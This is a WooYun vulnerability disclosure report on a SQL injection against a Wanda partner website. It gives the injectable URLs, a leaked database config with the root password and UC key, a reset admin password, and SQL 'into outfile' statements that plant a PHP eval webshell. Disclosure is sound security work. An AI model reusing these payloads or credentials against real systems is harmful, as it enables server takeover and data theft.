漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-046385
漏洞标题:万达某分站SQL注入ROOT权限(已getshell)
相关厂商:大连万达集团股份有限公司
漏洞作者: 爱上襄阳
提交时间:2013-12-18 23:10
修复时间:2014-02-01 23:11
公开时间:2014-02-01 23:11
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-18: 细节已通知厂商并且等待厂商处理中
2013-12-19: 厂商已经确认,细节仅向厂商公开
2013-12-29: 细节向核心白帽子及相关领域专家公开
2014-01-08: 细节向普通白帽子公开
2014-01-18: 细节向实习白帽子公开
2014-02-01: 细节向公众公开
简要描述:
万达某分站SQL注入ROOT权限(已getshell)
详细说明:
万达分站大玩家官网SQL注入ROOT权限(已getshell)
注入点:
http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7
http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7&id=736
数据库信息:
通过暴露出的路径读ucenter配置文件:
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', 'localhost');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'superplayer0!');
define('UC_DBNAME', 'superplayer');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`superplayer`.flydis_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', '123456');
define('UC_API', 'http://www.flyhigh.com.cn/bbs/uc_server');
define('UC_APPID', '1');
define('UC_IP', ' ');
define('UC_PPP', 20);
在本地架设进行配置:
此时成功修改了admin的密码,这里将admin的密码改成了123!@#a,请厂商自行修改。
成功进入了论坛后台:
参考乌云X2 root getshell WooYun: Discuz X2 后台getshell(当mysql为root时)
在站长-数据库-升级进行SQL执行
select '1' into outfile 'D:/AppServ/www\bbs/1.txt'
/*!select*/ '1' /*!into outfile*/ 'D:/AppServ/www/bbs/3.txt'
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'D:/AppServ/www/bbs/bbs.php'
成功写入一句话
漏洞证明:
同上
修复方案:
关键字过滤;bbs.php自删;密码自己重设吧。
版权声明:转载请注明来源 爱上襄阳@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-12-19 00:41
厂商回复:
感谢爱上襄阳同学的关注与贡献!此漏洞目测存在且为严重漏洞。只是有一点,这个网站不是我公司站点,是我方合作伙伴站点。马上将此问题转至合作伙伴处理!谢谢!
最新状态:
暂无